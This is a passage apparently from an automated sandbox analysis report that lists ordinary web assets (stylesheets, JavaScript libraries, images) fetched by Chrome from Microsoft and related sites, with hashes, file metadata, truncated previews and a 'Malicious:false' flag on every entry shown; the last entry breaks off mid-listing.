                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x758, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):17952
                                                                                                                                                                                                                                                          Entropy (8bit):7.968896931169015
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:MyEPyjXC2BaGxPHQNfzXxft0VPPcqzQPFNQC91GGStFxNK89Or:8PytBattVqYN9nVStXNK89
                                                                                                                                                                                                                                                          MD5:62AB961B5F2C83C97F651B39CCCD3EE5
                                                                                                                                                                                                                                                          SHA1:8B49B5C50058960B9E22B5FB11A45734FB652623
                                                                                                                                                                                                                                                          SHA-256:48B10FF781D30DB4EFEAA14E432A9D7E17DCCA26A98A12204A63E62879297E0C
                                                                                                                                                                                                                                                          SHA-512:958BDF5B3D1B404D298461817C771B901EE482895B7A8AAF5A8994AE9F02174CD33112E55A30F95DA6E4660372181C0DF153869572814BB30BADF97091A3A2EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFF.F..WEBPVP8 .F.../...*@...>...B!..7...a--..5../..B..i...loD.+......;...w.....].7./...p.../..f......./....s..{<.................[..._..............k..........~............g.....;.......O.... ......=O..........>....G...@.v,....1?....1..};.....'.....z....#.....p..../.l .68....Btou...M..=.....L-t..CYz.K.......r.C.|[.._$.w...Oi...y.:.%...XPkWL...#z[y...Yk.^V.,.O.........F.......Db.V...L....MP...fdFz...LzaluB...dC.2"7.....;.:..|B.h.f.(.....`..I~c.@/`...."..>\._L...w.D....U.i..Wy..&A.H.;+.m.;3U..R..;.*.(vf...o.....CPl.CC.BT..*..:.Fupj&(f...nw+LZ"....[....pB.+&...qb_..M.!..6.U{e.8...K......xgH=+.Y.>D.o6....IN...L.V\3..F..fX.z.>9.0.....W*.M..T..R.......M....}...w.W...c..y.e...tOK(......~..&....zk.i_.7Q...{....W@Gi..|O..5....y.....l:.3...$. ..`......y..g.}z.LP.{.'{..xa6.x......$.3....eI..E..`q3..-..k.}..8bk>..-......?..*l.Hs......t.............A.X..f..U..J.m.lp...Z.6,.f.nC,.1......F."....M.*.un.2}.r....}....a.p.t[....R..RV..W...18.Fo.%L.."i.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1249
                                                                                                                                                                                                                                                          Entropy (8bit):7.399495937369451
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:+cKYj6LyzdTwVnbwW80mxJd8JgEpiaZfVGGj60MI4:+cKYjwyRTw54kBpJ9puJ
                                                                                                                                                                                                                                                          MD5:B1B2DC6D89BBF2B0A53D6CDF539450AF
                                                                                                                                                                                                                                                          SHA1:9FF6669EA52A2FDA867E97905E0C6BAF5F365F7E
                                                                                                                                                                                                                                                          SHA-256:CC3C2A7ED65F088033282532D5BDB3C9CBFC73B870077EEC30AF33CC02D6344B
                                                                                                                                                                                                                                                          SHA-512:77301DECDD7BF360015A78B97677E5A02C17F770F629F111CF2E73E0AD75FA8C89296F27BAC5EA438C645D657845FCA22117FE52D23E5670010DC5AB90915432
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_BPI_icon1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=96&hei=96&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......`...`....pixi............av1C........colrnclx...........ipma...................mdat........`...B2..D....'...$....S=N.R.L(....#.`.A+...B......g.....6P......I.)..h4.l.a.^W...Fc.....^.BDBbW...E.z(.k/... ...B..M.>.L.B\r....".`.;.?e.5A..P.1._.Y..~d.u......X...../.>{.TNZ.K/...3...{2.z....\yl.@...b.`m..%.6<'.. P...).B/\Y_...v.3X.....]8........T.......$Q.q...../...B.....o.....C...3..>..h.......n..C......H.{....V..Kd......rU..{1Nx...t...V5N,..[.[5)R.G.{V.rt<...-.......`i...^.7)....m.nF(....0.R9>#...k....?B.s..x..a.&.......'.T..c.XG.73O.-.+t8DR..F.^fd...{..~e9b.9L.[8.......w..N...u..&.(.op.5.!%k........v.n`.q .s..t.!?..].o.......h.O..o..m.wiaT}4.( ..l..{>.E....J.....`1.x.....H..8......"c..`....u..).6.....I.....+.;.l.....&..]V..O..I....gI.)S.....Y,CN. .\.......
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4022), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):4022
                                                                                                                                                                                                                                                          Entropy (8bit):5.2156097633455385
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:i+P+GSWasaYAj2DKeDmU5YB0pCLW2sR9Rc1X:i+P+JWasaYAjgRDmBBqC62sR9Rc1X
                                                                                                                                                                                                                                                          MD5:5497543701DC0979345DDA906D4529B8
                                                                                                                                                                                                                                                          SHA1:823EFAF3952F281A0F1E7499BA2B0548D9BB2BB1
                                                                                                                                                                                                                                                          SHA-256:1FE4706FADCB8F1917B87A3CD47536297D6E085F1DC1844DBFEFE86BFACF46A5
                                                                                                                                                                                                                                                          SHA-512:B07426D1F7C00958F442523636A12FA4D5AB4A8D2FE5A28BCD3BBEAF850E3881C713E1F71E4CBBAF12D6BCC08EFBA02A4FE94D0EF0C2F36DB46EB0D6DC597B98
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/msonecloudapi/assets/msochead.css
                                                                                                                                                                                                                                                          Preview:header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature h1.text-teams{margin:0}header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature .card-body .link-group.link-group-col-2{margin-top:35px}[data-component-id=d86b06c2fa504a3e1bfc37d37bc0eee7] .nav-bar{z-index:500}#highlight-ocf2a1 .card-background{margin-top:0;margin-bottom:0}#highlight-ocf2a1 .card-background>img,#highlight-ocf2a1 .card-background>picture{height:100%;width:100%}#layout-container-uid93df .row>.col{align-self:unset!important}@media (min-width:860px){#layout-container-uid93df .row>.col{display:flex}#layout-container-uid93df .col.align-self-start.text-md-left.no-gutters.mb-4.mb-md-0{padding-bottom:1.5rem!important}}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row{margin-left:0;margin-right:0}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row [class*=col-]{padding-left:0;padding-right
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):406
                                                                                                                                                                                                                                                          Entropy (8bit):4.645093417199183
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:M9BAG1/qAT9BAs1/qKdDYT9BAR6T9BAOk/CMRZcJfRDZ:M9p/qS91/qfT9J9yRC5N
                                                                                                                                                                                                                                                          MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                                                                                                                                                          SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                                                                                                                                                          SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                                                                                                                                                          SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-uhf.min.ACSHASHf9f2395c582fa601707b7a5dfae9f05f.css
                                                                                                                                                                                                                                                          Preview:.c-uhfh .c-action-trigger.glyph-shopping-cart span:not(.shopping-cart-amount),.c-uhfh .c-action-trigger.glyph-shopping-bag span:not(.shopping-cart-amount){line-height:48px !important}..c-uhfh .c-action-trigger.glyph-shopping-cart:after,.c-uhfh .c-action-trigger.glyph-shopping-bag:after{line-height:43px}..c-uhfh.c-sgl-stck .c-search button{line-height:18px}..msame_Header_name{line-height:44px !important}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32098)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):143130
                                                                                                                                                                                                                                                          Entropy (8bit):5.330341741940889
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:dq6o9bcpWoraMVwSrutmMiA+78ffv1N0w9h5fGTWOctxEPEtqQw/etDdgnGOY:2c2fv1N0w9hxxEPEtqQw/4KnGP
                                                                                                                                                                                                                                                          MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                                                                                                                                                                                                          SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                                                                                                                                                                                                          SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                                                                                                                                                                                                          SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (566)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):61208
                                                                                                                                                                                                                                                          Entropy (8bit):5.486865205392623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qCLbrNurYZRrfHvWCOqbEC9EbivVZh3ctWNwtBSg646z:qC/purwhfPWCOqbEC9EG3sDP6z
                                                                                                                                                                                                                                                          MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                                                                                                                                          SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                                                                                                                                          SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                                                                                                                                          SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-polyfills.min.ACSHASHf381d5147c85ee687ea8fbef32c83d37.js
                                                                                                                                                                                                                                                          Preview:/*. Copyright (C) 2013-2015 by Andrea Giammarchi - @WebReflection.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the Software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER. LIABILITY, WHETHER IN AN
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):22748
                                                                                                                                                                                                                                                          Entropy (8bit):7.97936926396813
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:93H5mXewvfCMIiEt7AecatAZL07gOwjhOARw53k4T8aTReNKtqQ08081F1:93H5mQB7A+tAZLvOw8Sw504nT0g0p8/1
                                                                                                                                                                                                                                                          MD5:E8842769971110AD7D5770549FD2147F
                                                                                                                                                                                                                                                          SHA1:51F4878C2E87CC489106C97B109E571C432BB37B
                                                                                                                                                                                                                                                          SHA-256:E4E089B3C74831C7A49A60C22F89BA73F4E46088282E2196298BA8B9FF6B840A
                                                                                                                                                                                                                                                          SHA-512:C59A7A36D84AACA95CE09F33D1AAF1214EAE7B13327CF9E577E4E2693E5C00CFE46DBE604BEAB6F9768F5C4F9E2C277691CED141C8C1C1269A2CA26B320D16BE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_PBI_opt2?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=3200&hei=1000&qlt=100&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............W....(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................W.mdat......j......B2...D........E..S8%.Qm..D+....g...L.A...%....GQQgMA...A,.o..y.)..TH.._O..=.....<?.78....S.....mp.W.vo ..../..n.}.\..^..[;....R.....Ol.U.A..)*..].jEhH.&.......2.Ea....m^...c".!5.(.i.b.y# j.Qu)l..i.....@.......t..,h<.0j..t.......IC.4....._3.Z.S...W.+.W.f..U......C...Yd.."....q.[.'..M.K...M..Zt..Z.PG..(.]b.Ip..:.Vm.T......eFE].....Yb-.K.kV.p..-Y.T.._`$...%..}..P.l....%=.'....K..8......B.9....1N.+...7..6u...G_1...>u+(.[..g..e.CF...f.l.Y.9hK..w..3.G..K9?...m_.n?...y.{.M..v.....B..[8.....B..N....t._=.Y.A..4..w.a...z.....Iw.|%.....m....Q......C.x$...)g.^.<.}.yCx8=`i....U.b......f.c.o..^S.)...*$!x5.......[V...?..|.......)5p.Wz1.:.t.1..d.Ko3[..u6............#W..x)0...\.5..&E.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):422
                                                                                                                                                                                                                                                          Entropy (8bit):4.615395128455073
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:uM4jKgJM1bMoQ4jKgJMQsYEI5pAJM4jKgJMQsYEI5pEXSojC4jKgJ3ClY8pJt4jb:uJJOYsJYI3IJYI3MScHJ3apJoJn2YZ
                                                                                                                                                                                                                                                          MD5:2ADD065651AFB45E8C80967DD7B86A41
                                                                                                                                                                                                                                                          SHA1:32A99770B83F754338EDF886571A91CEDD404F70
                                                                                                                                                                                                                                                          SHA-256:3ECC4A2E8123EAD290D257F820C1CDAFB484A990B5D71AF3F6406CC85978B21B
                                                                                                                                                                                                                                                          SHA-512:F0C2500211E649627495B98D3F040C834B4B3E53FDB31F78C7BED6D4421A70968BF5565BD57A2916423D2CE093FBB188AE78364F13DB31E2E5F589B043F90DFC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH2add065651afb45e8c80967dd7b86a41.css
                                                                                                                                                                                                                                                          Preview:[data-oc-product]:not([data-oc-product*=Success])>*{display:none !important}.[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"],[data-oc-product]:not([data-oc-product*=Success]) [data-oc-product="not-available"] *{display:block !important}.[data-ocr-product]:not([data-ocr-product*=Success]):has(.sku__unavailable) [data-oc-product]:not([data-oc-product*=Success]){display:none !important}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2436
                                                                                                                                                                                                                                                          Entropy (8bit):4.675816652909621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:sebcrpamZrX1/W4/PiIgpzCzj12SoOTj+/3cuq2VqP:seslX1/WIks1Ho8+P1qt
                                                                                                                                                                                                                                                          MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                                                                                                                                          SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                                                                                                                                          SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                                                                                                                                          SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (27332), with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):27332
                                                                                                                                                                                                                                                          Entropy (8bit):5.48233759733871
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:sQ43HT5jFkfHlHOF1cCVVbO8IkFzjBCK2be7R1G1E2Jnkef3:sQKU6OCb68IkFRCKSV
                                                                                                                                                                                                                                                          MD5:4502CFFD9A049B7D23CF17CC2DE9B80D
                                                                                                                                                                                                                                                          SHA1:2150B19E2378B68F766A958A1408E599C556BE44
                                                                                                                                                                                                                                                          SHA-256:2823FBFA7B9256867E21AF1ECBFBB98583C8EF0E0B495F6F01D862EF58E3D93D
                                                                                                                                                                                                                                                          SHA-512:28CE499A0787323277957763ADE1B7F5341E547CF82ECE2E4B7CD4F35B250B48F87596CF2E580D7400FE5FB35D73493D932781E851E254753A61EF123EB2EA32
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://lptag.liveperson.net/tag/tag.js?site=60270350
                                                                                                                                                                                                                                                          Preview:window.lpTag=window.lpTag||{};lpTag.taglets=lpTag.taglets||{};lpTag._tagv="4.1.13";!function(a,b){function c(c,d,e){b._logcnt=b._logcnt||0;H(c,d,e,b._logcnt);if("undefined"!=typeof a.lpTaglogListeners&&a.lpTaglogListeners.constructor===Array)for(var f=0;f<lpTaglogListeners.length;f++)try{lpTaglogListeners[f](c,d,e,b._logcnt)}catch(g){H("Exception="+g.message+" msg="+c,d,e,b._logcnt)}b._logcnt++}function d(a){if(a)for(var b=0;b<a.length;b++)qa[a[b].service]=a[b].baseURI}function e(){for(var a=Ga.PRODUCTION,c=b.ovr&&b.ovr.domain,d=0;d<Ha.length;d++)if(Ha[d].tagDomain===c){a=Ha[d].env;break}return a}function f(a){var c;a=a||e();if("string"==typeof a)for(var d=0;d<Ha.length;d++)if(Ha[d].env===a&&(b.tagletsPrecomputed&&Ha[d].tagletsPrecomputed||!b.tagletsPrecomputed&&!Ha[d].tagletsPrecomputed)){c=Ha[d].tagDomain;break}return c}function g(a){var b=qa[a],c="ALL";return b?b:qa[c]}function h(){return qa}function i(a){return l(ra,a)}function j(a){return l(sa,a)}function k(a,b){for(var c in b)b.h
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65397)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):140778
                                                                                                                                                                                                                                                          Entropy (8bit):5.44675798903284
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:WqiL9gAam/uphj/wkMLfMZ4jMFHTuT8K7He:oL9g4UlIm5HSTL7+
                                                                                                                                                                                                                                                          MD5:94FEEC31F6FD531C80B08FAE26EB275C
                                                                                                                                                                                                                                                          SHA1:96F904FC6D751F8CFBA18D506CB1067CB0AC25FC
                                                                                                                                                                                                                                                          SHA-256:1569DD95C870F769B2BC3909C52C08303956BEF7DFC288402D3B8BB13148BC10
                                                                                                                                                                                                                                                          SHA-512:EBFC643C65EA79F4930AE22AA752C79252B91D97B0A5BB4407D262BAF76C2BA84A05D0064E095D4DFC9BBE727B38428FF1D741C045F0B5A85ED38ED0A1A3C3C3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.min.js
                                                                                                                                                                                                                                                          Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var i,n=typeof globalThis!=n?globalThis:e||self,r={},e="__ms$mod__",a={},o=a.esm_ms_analytics_web_3_2_18={},c="3.2.18",u="oneDS3",s=(s=n)[u]=s[u]||{},l=(l=n)[u="oneDS"]=l[u]||{},n=s[e]=s[e]||{},f=n.v=n.v||[],u=l[e]=l[e]||{},d=u.v=u.v||[];for(i in(u.o=u.o||[]).push(a),t(r),r)s[i]=r[i],f[i]=c,l[i]=r[i],d[i]=c,(o.n=o.n||[]).push(i)}}(this,function(n){"use strict";!function(e,t,n){var i=Object.defineProperty;if(i)try{return i(e,t,n)}catch(r){}typeof n.value!==undefined&&(e[t]=n.value)}(n,"__esModule",{value:!0});var c="function",u="object",fe="undefined",f="prototype",s="hasOwnProperty",l=Object,g=l[f],v=l.assign,y=l.create,e=l.defineProperty,T=g[s],I=null;function b(e){e=!1===(e=void 0===e||e
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):206
                                                                                                                                                                                                                                                          Entropy (8bit):5.069458334688229
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:U75xFzBUOLsNIVesQQIVYEYUBRa1dLMxPMN8iYpn3MQf:U7b9BU3KVesQdrYYRW6PMfsf
                                                                                                                                                                                                                                                          MD5:131D95CF2EC0E511B73B264FA0C84059
                                                                                                                                                                                                                                                          SHA1:10A0E2E7C996B7C482B64B953F0A443672A55CF7
                                                                                                                                                                                                                                                          SHA-256:44A041D41D7F1E7C09AFBCF26471F2370C7182C915633049DDD27229DDBE2C33
                                                                                                                                                                                                                                                          SHA-512:6D90DB6F32278A6507158107EC23F48C700DF46103F1860B9DE0305662A0755CBCF52EC1F35D9289A4BFEBF6C4C88D1E5C2C76E776C12BCB56A8051AA3343EB1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/inline-video/v2/cascade-media-player/clientlibs/site.min.ACSHASH131d95cf2ec0e511b73b264fa0c84059.css
                                                                                                                                                                                                                                                          Preview:/*!..To avoid conflict with MWF styles, added a wrapper class.. */.ump-container{max-width:100%}..ump-sm{width:800px}..ump-md{width:1200px}..ump-lg{width:1600px}..ump-xl{width:1920px}..ump-fill{height:100%}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):1340
                                                                                                                                                                                                                                                          Entropy (8bit):5.340331154152696
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tOEPutvyBLfJ6KDjDq+qes12ygdBLG8cD168Q2BLN2HxNNcGdGH2kQHxNNcG9GIa:9kkLvD/3DyYLck8QoLIHtEH23HtkIyHX
                                                                                                                                                                                                                                                          MD5:5984947DF59FE0699EADBAFB42861404
                                                                                                                                                                                                                                                          SHA1:9AEAF7DBC1C6774D7F5FD19EBB001C824C03E7B3
                                                                                                                                                                                                                                                          SHA-256:0B3C5E550FD754CFBD4BDCA1185A108309C1FD3B7ABEED8A012BD38F27C71A25
                                                                                                                                                                                                                                                          SHA-512:3290C21145AF2306920E4590FDCEB98F86CE47472AA6070FAB4438B7FFD99B1D545E2403946A3130CDC253B0C96A065C794A8063E5A59B4C0E34C5D6A3F25631
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-product-and-services/power-platform/icon-powerBI.svg
                                                                                                                                                                                                                                                          Preview:<svg width="116" height="183" viewBox="0 0 116 183" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M115.525 0V175.78H64.9211V0H115.525Z" fill="url(#paint0_linear_2793_6730)"/>.<path opacity="0.25" d="M83.3227 54.0154V178.526H32.719V46.6914H77.1891C80.5768 46.6914 83.3227 49.9708 83.3227 54.0154Z" fill="black" stroke="black" stroke-opacity="0.5" stroke-width="7.33797"/>.<path d="M83.3227 51.2689V175.78H32.719V43.9449H77.1891C80.5768 43.9449 83.3227 47.2243 83.3227 51.2689Z" fill="url(#paint1_linear_2793_6730)"/>.<path d="M0.516846 87.89V175.78H51.1206V95.214C51.1206 91.1694 48.3742 87.89 44.9865 87.89H0.516846Z" fill="url(#paint2_linear_2793_6730)"/>.<defs>.<linearGradient id="paint0_linear_2793_6730" x1="56.4873" y1="1.08736e-06" x2="140.728" y2="154.216" gradientUnits="userSpaceOnUse">.<stop stop-color="#E6AD10"/>.<stop offset="1" stop-color="#C87E0E"/>.</linearGradient>.<linearGradient id="paint1_linear_2793_6730" x1="32.7149" y1="43.9449" x2="102.931" y2="161.553" gradient
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):163516
                                                                                                                                                                                                                                                          Entropy (8bit):7.998777935374207
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:3072:vb7E5DlrucoEvW65ROSDaLLWhImAMNII3xCfLRJtmaQCVNvRFE:vb7EhlaT6tbqLKImHNII3xGLftrVO
                                                                                                                                                                                                                                                          MD5:68D1EB1D25065C1BF954BDDEB8E04B56
                                                                                                                                                                                                                                                          SHA1:1B931870F88161A9830BABE956EE5D889C486008
